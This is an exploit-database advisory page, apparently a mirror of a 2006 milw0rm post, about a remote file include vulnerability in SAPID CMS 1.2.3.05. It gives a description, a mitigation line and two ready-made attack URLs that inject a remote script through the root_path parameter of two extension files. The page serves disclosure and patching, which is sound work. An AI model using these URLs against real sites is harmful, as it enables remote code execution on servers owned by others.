header-logo
Suggest Exploit
vendor:
SAPID CMS
by:
Kacper (a.k.a Rahim)
7,5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: SAPID CMS
Affected Version From: 1.2.3.05
Affected Version To: 1.2.3.05
Patch Exists: YES
Related CWE: N/A
CPE: a:sapid_cms:sapid_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

SAPID CMS <= v. 1.2.3.05 (root_path) Remote File Include Vulnerability

SAPID CMS version 1.2.3.05 is vulnerable to a remote file include vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing an arbitrary file path in the root_path parameter of the get_infochannel.inc.php and get_tree.inc.php scripts. This will allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of SAPID CMS or apply the patch provided by the vendor.
Source

Exploit-DB raw data:

$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$
$$  SAPID CMS <= v. 1.2.3.05 (root_path) Remote File Include Vulnerability
$$  Script site: http://sapid.sourceforge.net/
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$              Find by: Kacper (a.k.a Rahim)
$$
$$ Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$  Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
$$           Adam, DeathSpeed, Drzewko, pepi
$$
$$  Specjal greetz: DragonHeart ;-)
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Expl:

http://www.site.com/[sapidcms_path]/usr/extensions/get_infochannel.inc.php?root_path=[evil_scripts]

http://www.site.com/[sapidcms_path]/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=[evil_scripts]


#Pozdro dla wszystkich ;-)

# milw0rm.com [2006-08-07]